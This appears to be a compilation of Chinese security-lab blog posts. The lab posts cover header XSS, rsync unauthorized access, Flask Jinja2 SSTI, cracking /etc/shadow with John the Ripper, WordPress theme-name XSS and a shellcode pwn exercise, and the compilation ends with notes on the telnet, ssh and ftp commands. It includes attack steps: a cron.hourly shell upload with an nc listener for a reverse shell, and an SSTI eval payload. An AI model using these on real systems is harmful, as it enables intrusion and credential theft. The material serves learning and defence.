XSS via HTTP Headers
在看到BRUTE XSS有一个通过HTTP Headers进行XSS的练习,觉得蛮有意思的,也特别适合当作XSS的入门练习题,我来记录下,有需要的童鞋可以来围观下!
先来说下HTTP Headers XSS,一般在某些情况下,对来自应用程序的某个HTTP头部中的数据未做一些正确的过滤处理,从而就会产生XSS的情况。
我们来看下源码:
1 | <!DOCTYPE html> |
通过分析源码,我们可以看到PHP代码未对HTTP cookie做任何的过滤或者处理,直接将cookie中的name字段echo到页面,那么此处就会存在XSS。
我们先跑起来环境,如下图
正常情况下,我们访问到的页面如上图所示,我们也可以通过curl来访问;
接下来,我们通过curl 向HTTP Header的cookie注入XSS
我们已经看到,XSS脚步已经通过cookie注入显示到页面了,已经可以完美XSS了,对!弹框必须有
构建 Linux 可读写文件系统
最近拿到一个iot设备的root shell 后,并且该文件系统是只可读的,但是想把设备的固件通过shell提取出来,通过adb pull仅仅只能提取出部分的文件系统,而不是整个完整的文件系统,那么在这种情况下,我们该如何提取完整的固件系统,下面我记录下我们提取的过程:
0x00 嵌入式linux启动过程
首先,我们先来看一下相关的知识,我们就拿由 BootLoader、kernel、initrd、rootfs 组成的 Linux Image 来描述,它们共同存在于一个可以启动的存储设备中(本文以 USB 为例)。组成架构如下:
图一:可启动Linux 镜像文件结构
各模块的作用:
在启动过程中,其各个模块的调用顺序是 Boot Loader->kernel->initrd->rootfs。
当机器上电时首先 BIOS 会启动,然后装载 USB 设备中的 Boot Loader、kernel,、nitrd 到内存中,由于这些文件大小总和小于 10M,所以我们直接拷贝到内存中再执行不会有问题。
最后要加载的 rootfs 是用户最终进行读写操作的文件系统。
0x01 SquashFS只读文件介绍
SquashFS 是一个只读的文件系统,它可以将整个文件系统压缩在一起,存放在某个设备,某个分区或者普通的文件中。如果您将其压缩到一个设备中,那么您可以将其直接 mount 起来使用,而如果它仅仅是个文件的话,您可以将其当为一个 loopback 设备使用。
从上面我重点标记的这句话就可以知道,对这种固件的提取能不能采用这种办法呢?可以不可以呢,试试不就好了!
0x02 拷贝完整的固件文件并压缩为完整文件系统
首先我们按步骤来创建出该固件的完整的备份:
步骤 1-创建空的根文件系统,文件系统的大小为 65536 × 24000/1024/1024=1.5G。接下来我们会在这个空的根文件系统中存放文件。
1 | dd if=/dev/zero of=rootfs bs=65536 count=24000 |
[^dd]: dd: 读取源文件的内容并创建一个新文件,if 指定源文件内容,of 指定新文件名字,bs 和 count 指定新文件的大小 mke2fs: 将新创建的 rootfs 格式化为 Linux 可识别的文件系统
步骤 2-挂载空的根文件系统,将 1.5G 的文件系统挂载在 mnt 目录下,然后通过 mnt 目录将内容写入根文件系统
1 | 挂载空的根文件系统 |
步骤 3-拷贝根文件目录的内容到文件系统
1 | 拷贝根文件目录统 |
拷贝完后根文件系统的内容后,完成根文件系统的创建,这时的 rootfs 没有被压缩,接下来我们用工具将其压缩成 Squash 格式的文件系统
1 | mkdir squashfs-dir |
[^mksquashfs-4.1]: mksquashfs-4.1 是在安装 Squash 工具的过程中生成的命令,用于将一个文件夹下的内容打包并压缩成一个文件系统。其后第一个参数为文件夹,第二个参数为生成的文件系统。
0x03 制作为ext4文件系统
上面我们把提取出来的文件制作为Squash 格式的文件系统,我们还可以制作为我们想要制作的格式的文件系统,例如,我们可以制作为ext4文件系统,同理按照我们下面的步骤;
步骤1-新建目录rootfs_tmp文件,用于临时挂载文件系统
1 | mkdir -p rootfs_tmp |
步骤2-制作一个128M(128x1024=131072)的ext4空白文件:
1 | dd if=/dev/zero of=rootfs.ext4 bs=1024 count=131072 |
再将新建的rootfs.ext4文件格式化为ext4格式:
1 | sudo mkfs.ext4 rootfs.ext4 |
将rootfs.ext4文件挂载到前面新建的临时目录rootfs_tmp,注意这里要使用mount –o loop的属性,表示要把rootfs.ext4当作硬盘分区挂载到rootfs_tmp:
1 | sudo mount -o loop rootfs.ext4 ./rootfs_tmp |
这时,我们就可以给rootfs.ext4填充内容了。执行如下指令拷贝文件系统内容:
1 | cd ./rootfs_tmp |
拷贝完后,卸载挂载的rootfs.ext4文件,即完成了文件系统的制作:
1 | sudo umount ./rootfs_tmp |
这样就完成ext4格式的rooffs文件系统的制作。
通过这种方式我们就可以提取出整个完整的固件!感觉一般没什么用,觉得好玩就记录下来。
0x04 参考链接
你也一定是某个人翘首以盼的惊喜!
最近在渗透环境中有遇到Rsync端口开放的,所以刚好也来复现下这个漏洞,亦当记录笔记:
0x00 漏洞介绍
Rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。常被用于在内网进行源代码的分发及同步更新,因此使用人群多为开发人员。其中rsync协议默认监听873端口,而一般开发人员安全意识薄弱的情况下,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。
0x01 环境搭建
环境搭建我依然用vulhub,简直太好了!
同样我们进入到/vulhub-master/rsync/common目录下,编译及运行rsync服务器:
1 | docker-compose build |
但在编译的时候有报错
解决:在Dockerfile文件中add 这一行
1 | RUN printf "deb http://archive.debian.org/debian/ jessie main\ndeb-src http://archive.debian.org/debian/ jessie main\ndeb http://security.debian.org jessie/updates main\ndeb-src http://security.debian.org jessie/updates main" > /etc/apt/sources.list |
接着我们继续来看看rsync的常用命令:
1 | 列举整个同步目录或指定目录: |
0x02 漏洞复现
nmap先扫一波:
1 | rsync rsync://your-ip:873/ |
1 | 我们可以下载任意文件: |
提权:
写入shell并赋权:
1 | #!/bin/bash |
将shell上传至/etc/cron.hourly:
1 | rsync -av shell rsync://192.168.91.130/src/etc/cron.hourly |
本地监听:
1 | nc -nvv -lp 4444 |
0x03 防范与总结
这种未授权访问漏洞,一般都是在配置的时候,未能实现安全配置或权限认证而导致的,所以我们先来看看rsync的文件配置与认证方式。rsync的默认配置文件为/etc/rsyncd.conf,常驻模式启动命令的rsync -daemon,启动成功后默认监听于TCP端口873,可通过rsync的守护及SSH两种方式进行认证。
我们来看下含有漏洞的rsync的文件的配置
rsync默认允许匿名访问,也可在其配置文件中为同步目录添加用户认证相关项,包括认证文件及授权账号,若未包含授权账号行(auth users),则为匿名访问。所以问题就出在这。
我们来看下配置文件:
1 | 配置文件位置:/etc/rsync.conf,常见配置项 |
漏洞修复:
host allow/deny 来控制接入源IP0x04 参考
【1】https://github.com/vulhub/vulhub/tree/master/rsync/common
【3】https://blog.csdn.net/qq_36374896/article/details/84143428
陪你走过那山高水长
陪你一起生长
周末拈来一本书,刚好看到之前学习的Flask,今天刚好来学习下服务器模板注入(SSTI),来记录一下:
0x00 漏洞介绍
服务端模板注入(SSTI):服务端接收了用户的输入,将其作为 Web 应用模板内容的一部分,在进行目标编译渲染的过程中,若用户插入了相关恶意内容,结果可能导致了敏感信息泄露、代码执行、GetShell 等问题,所以永远不要相信用户输入。
Template engines are widely used by web applications to present dynamic data via web pages and emails. Unsafely embedding user input in templates enables Server-Side Template Injection, a frequently critical vulnerability that is extremely easy to mistake for Cross-Site Scripting (XSS), or miss entirely. Unlike XSS, Template Injection can be used to directly attack web servers’ internals and often obtain Remote Code Execution (RCE), turning every vulnerable application into a potential pivot point.[from us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp]
0x01 环境搭建
Vulhub简直不要太方便了
在ubuntu16.04下安装docker/docker-compose:
1 | # 安装pip |
1 | # 下载项目 |
0x02 漏洞复现
搭建环境完成后,访问http://your-ip/?name=66,得到66,说明SSTI漏洞存在。
-服务端模板注入漏洞/1.PNG)
在这种漏洞下,我们可以获取到inja2中可以获取的数据,jinja2设计被运行在沙箱中,来以保证安全,若我们能逃逸jinja2的沙箱,那么我们就可以实现命令执行让对方服务器运行我们指定的恶意代码,以达到getshell或者文件读取的目的。
沙箱逃逸部分有时间补上!
接下来获取eval函数并执行任意python代码。[poc来自github]
1 | {% for c in [].__class__.__base__.__subclasses__() %} |
-服务端模板注入漏洞/2.PNG)
-服务端模板注入漏洞/4.PNG)
-服务端模板注入漏洞/3.PNG)
0x03 防范与总结
始终不要相信用户输入,将用户输入传递到模板当中,或者对输入的数据进行过滤与转义
将模板内容与view代码分离
0x04 参考
[1]https://github.com/vulhub/vulhub/tree/master/flask/ssti
[2]https://www.smi1e.top/flask-jinja2-ssti-%E5%AD%A6%E4%B9%A0/
[3]https://www.kingkk.com/2018/06/Flask-Jinja2-SSTI-python-%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/
斯人若彩虹,遇上方知有
0x01 Redis介绍
Redis是一个使用ANSI C编写的开源、支持网络、基于内存、可选持久性的键值(key-value)对存储 (store) 数据库。(基于 BSD 许可的,高级键值 (key-value) 缓存 (cache) 和存储 (store) 系统。)从2015年6月开始,Redis的开发由Redis Labs赞助,而2013年5月至2015年6月期间,其开发由Pivotal赞助。)在2013年5月之前,其开发由VMware赞助。根据月度排行网站DB-Engines.com的数据显示,Redis是最流行的键值对存储数据库。由于 Redis 的键包括 string,hash,list,set,sorted set,bitmap 和 hyperloglog,所以常常被称为数据结构服务器。
Redis因配置不当可以未授权访问。攻击者无需认证访问到内部数据,可导致敏感信息泄露,也可以恶意执行flushall来清空所有数据。
0x02 环境搭建
1 | #靶机:CentOS7.0 |
0x03 漏洞复现
0x04 填坑过程
安装Redis-3.2.0时报错:
make[1]: Entering directory `/home/fanson/redis-3.2.0/src’
CC adlist.o
In file included from adlist.c:34:0:
zmalloc.h:50:31: fatal error: jemalloc/jemalloc.h: No such file or directory
include <jemalloc/jemalloc.h>
compilation terminated.
make[1]: [adlist.o] Error 1
make[1]: Leaving directory `/home/fanson/redis-3.2.0/src’
make: [all] Error 2
解决方法
Allocator
Selecting a non-default memory allocator when building Redis is done by setting the MALLOC environment variable. Redis is compiled and linked against libc malloc by default, with the exception of jemalloc being the default on Linux systems. This default was picked because jemalloc has proven to have fewer
fragmentation problems than libc malloc. To force compiling against libc malloc, use:
make MALLOC=libc
To compile against jemalloc on Mac OS X systems, use:
make MALLOC=jemalloc
0x05 参考文献
https://www.anquanke.com/post/id/170360
https://uknowsec.cn/posts/notes/Redis%E5%9C%A8Windows%E7%8E%AF%E5%A2%83%E4%B8%8BGetshell.html
你会不会突然的出现,在街角的咖啡店!
最近有遇到对/etc/shadow中的密码进行爆破问题,但是却没有成功,之前记得也有过总结这个,却找不到了。无奈就过来再记录下,以免下次查阅!
/etc/passwd
/etc/passwd是系统识别用户的一个文件,这个文件存放着所有用户账号的信息。其中当然包括账号与密码。当我们以root这个账号登录时,系统首先会查阅 /etc/passwd 文件,看是否有root这个账号,然后确定root的UID,通过UID 来确认用户和身份。
/etc/passwd的文件内容:
1 | root权限下执行查看 |
1 | root:x:0:0:root:/root:/bin/bash |
系统中有一类用户称为伪用户(psuedo users),这些用户在/etc/passwd文件中也占有一条记录,但是不能登录,因为它们的登录Shell为空。它们的存在主要是方便系统管理,满足相应的系统进程对文件属主的要求。常见的伪用户如下:
| bin | 拥有可执行的用户命令文件 |
|---|---|
| sys | 拥有系统文件 |
| adm | 拥有帐户文件 |
| uucp | UUCP使用 |
| lp | lp或lpd子系统使用 |
| nobody | NFS使用 |
除了上面列出的伪用户外,还有许多标准的伪用户,例如:audit, cron, mail, usenet等,它们也都各自为相关的进程和文件所需要。
/etc/shadow
由于/etc/passwd文件是所有用户都可读的,如果用户的密码太简单或规律比较明显的话,一台普通的计算机就能够很容易地将它破解,因此对安全性要求较高的Linux系统都把加密后的口令字分离出来,单独存放在一个文件中,这个文件是/etc/shadow文件。 有超级用户才拥有该文件读权限,这就保证了用户密码的安全性。
【/etc/shadow中的记录行与/etc/passwd中的一一对应,它由pwconv命令根据/etc/passwd中的数据自动产生】
它的文件格式与/etc/passwd类似,具体如下
1 | # cat /etc/shadow |
1 | root:$36zQdAHKBxYr1lSPP26x1IhP6bOAigu7qO1ENtsyfxtU6hHvMdQMrgfxKhJ/ltkgAYwqA45ps/2HTF6saI/6gzLe7sF6kr1:16596:0:99999:6::: |
后三个一般是没有的
“加密口令”字段存放的是加密[MD5,SHA-256,SHA-512]后的用户口令字,长度为13个字符。如果为空,则对应用户没有口令,登录时不需要口令;如果含有不属于集合 { ./0-9A-Za-z }中的字符,则对应的用户不能登录。
密码爆破
最后介绍下如何爆破,我们先来了解下linux系统密码加密的原理:
密文由3部分组成,以”$”分隔,第一部分为ID(用来表示加密的方法),第二部分为盐值,第三部分为加密密文
| ID | 加密方法 |
|---|---|
| 1 | MD5 |
| 5 | SHA-256 |
| 6 | SHA-512 |
盐值:盐值就是使用随机字符码混合密码加密算法所产生的密码,作用就是即使是同一个密码,使用同一种加密方式,所产生的密文值也不同 。
工具爆破:John the Ripper (“JtR”) 是一个非常有用的工具。这是一个快速的密码破解器,适用于Windows和许多Linux系统。它具有很多功能,对于很多密码破解均有奇效。JtR破解的文件必须有特定的格式。要转换passwd和shadow文件,我们需要利用/usr/sbin/unshade可执行文件。这需要超级用户权限才能执行。
1 | sudo /usr/sbin/unshadow /etc/passwd /etc/shadow > ~/passwords.txt |
1 | /usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt ~/passwords.txt |
即可完成爆破。
该工具的详细是使用功能可见https://xz.aliyun.com/t/3958
Wordpress <= 4.6.1 Stored XSS 漏洞复现
我多想再见你
哪怕匆匆一眼
发现自己对web漏洞的一些点理解的还是不够深。所以准备复现一波web漏洞,加深自己对一些点的理解深度和巩固下知识!
0x00 漏洞概述
首先,我们来了解下wordresss,WordPress是一个以PHP和MySQL为平台的自由开源的博客软件和内容管理系统,WordPress具有插件架构和模板系统,截至2018年4月,排名前1000万的网站超过30.6%使用WordPress[1]。WordPress是最受欢迎的网站内容管理系统,WordPress在最着名的网络发布阶段中脱颖而出。如今,它被使用在超过7000万个站点上。
WordPress用户可以安装和切换主题。主题可让用户不改变博客内容和结构的情况下更改界面和WordPress站点的功能。主题可以在WordPress的“外观”管理工具中安装,或者通过FTP上传至主题文件夹。也可以通过编辑主题中的PHP和HTML代码自定义主题。而漏洞是一个后台存储型XSS漏洞,可以通过上传恶意构造的主题文件来触发。【上述内容来自维基百科】
0x01 环境搭建
本来这个环境是很容易的搭的啊,但刚开始就是一直报错,到最后一直改了又改,最终还是
1 | docker: Error response from daemon: Cannot link to a non running container |
到最后一直改了又改,最终还是报错,无奈重新搭建,果然重建是第一生产力。
1 | docker exec -it 0027a12dab6d /bin/bash |
最后终于搭建完成,命令如下
1 | docker pull wordpress:4.6.1 |
0x02 漏洞复现
首先,我们先下载一个主题
1 | wget https://downloads.wordpress.org/theme/illdy.1.0.29.zip |
并且对其illdy/style.css进行如下更改:
1 | /* |
接着更改文件夹名字再打包:
1 | mv illdy "<svg onload=alert(fans0n)>" |
构造好之后我们登录后台上传该主题文件,同时开始动态调试。
周末看到了这道题,学习记录下来!
首先我们先来看源代码:
1 |
|
通过看源码,能明显的看出,read()函数处存在明显栈溢出,接着我们来运行下程序,熟悉程序的各个功能。
检查该程序打开的保护措施
NX保护关闭,就更容易利用了
我们就可以来捋下大致的利用思路,通过read()函数,把shellcode读进去BBS段
接下来,我们就可以操作了;
用cyclic 100生成100个字符来覆盖返回地址,并将这些字符输入给程序来得到无效地址
结合cyclic -l 无效地址来得到返回地址,并将shellcode放入该返回地址处
通过ida找到bbs段的地址
结合pwntools,构造rop,写exp
1 | from pwn import * |
最终成功获得shell
本文为听b站莫笑老师的笔记记录吧
登录远程主机和管理(测试ip端口是否连通)
telnet命令 用于登录远程主机,对远程主机进行管理。telnet因为采用明文传送报文,安全性不好,很多Linux服务器都不开放telnet服务,而改用更安全的ssh方式了。但仍然有很多别的系统可能采用了telnet方式来提供远程登录,因此弄清楚telnet客户端的使用方式仍是很有必要的。
语法:
telnet(选项)(参数)
选项
1 | -8:允许使用8位字符资料,包括输入与输出; |
参数
实例
1 | $ telnet 192.168.2.10 |
一般情况下不允许root从远程登录,可以先用普通账号登录,然后再用su -切到root用户。
1 | $ telnet 192.168.188.132 |
处理这种情况方法:
确认ip地址是否正确?
确认ip地址对应的主机是否已经开机?
如果主机已经启动,确认路由设置是否设置正确?(使用route命令查看)
如果主机已经启动,确认主机上是否开启了telnet服务?(使用netstat命令查看,TCP的23端口是否有LISTEN状态的行)
如果主机已经启动telnet服务,确认防火墙是否放开了23端口的访问?(使用iptables-save查看)
启动telnet服务
1 | service xinetd restart |
配置参数,通常的配置如下:
1 | service telnet |
如果要配置允许登录的客户端列表,加入
1 | only_from = 192.168.0.2 #只允许192.168.0.2登录 |
如果要配置禁止登录的客户端列表,加入
1 | no_access = 192.168.0.{2,3,4} #禁止192.168.0.2、192.168.0.3、192.168.0.4登录 |
如果要设置开放时段,加入
1 | access_times = 9:00-12:00 13:00-17:00 # 每天只有这两个时段开放服务(我们的上班时间:P) |
如果你有两个IP地址,一个是私网的IP地址如192.168.0.2,一个是公网的IP地址如218.75.74.83,如果你希望用户只能从私网来登录telnet服务,那么加入
1 | bind = 192.168.0.2 |
各配置项具体的含义和语法可参考xined配置文件属性说明(man xinetd.conf)
配置端口,修改services文件:
1 | # vi /etc/services |
找到以下两句
1 | telnet 23/tcp |
如果前面有#字符,就去掉它。telnet的默认端口是23,这个端口也是黑客端口扫描的主要对象,因此最好将这个端口修改掉,修改的方法很简单,就是将23这个数字修改掉,改成大一点的数字,比如61123。注意,1024以下的端口号是internet保留的端口号,因此最好不要用,还应该注意不要与其它服务的端口冲突。
启动服务:
1 | service xinetd restart |
openssh套件中的客户端连接工具
ssh命令 是openssh套件中的客户端连接工具,可以给予ssh加密协议实现安全的远程登录服务器。
语法
1 | ssh(选项)(参数) |
选项
1 | -1:强制使用ssh协议版本1; |
参数
实例
1 | # ssh 用户名@远程服务器地址 |
用来设置文件系统相关功能
ftp命令 用来设置文件系统相关功能。ftp服务器在网上较为常见,Linux ftp命令的功能是用命令的方式来控制在本地机和远程机之间传送文件,这里详细介绍Linux ftp命令的一些经常使用的命令,相信掌握了这些使用Linux进行ftp操作将会非常容易。
语法
1 | ftp(选项)(参数) |
选项
1 | -d:详细显示指令执行过程,便于排错或分析程序执行的情况; |
参数
主机:指定要连接的FTP服务器的主机名或ip地址。
实例
1 | ftp> ascii # 设定以ASCII方式传送文件(缺省值) |
关闭FTP连接
1 | bye |
下载文件
1 | ftp> get readme.txt # 下载 readme.txt 文件 |
上传文件
1 | ftp> put /path/readme.txt # 上传 readme.txt 文件 |
内容来自【https://wangchujiang.com/linux-command/c/ssh.html】
整理为笔记以记之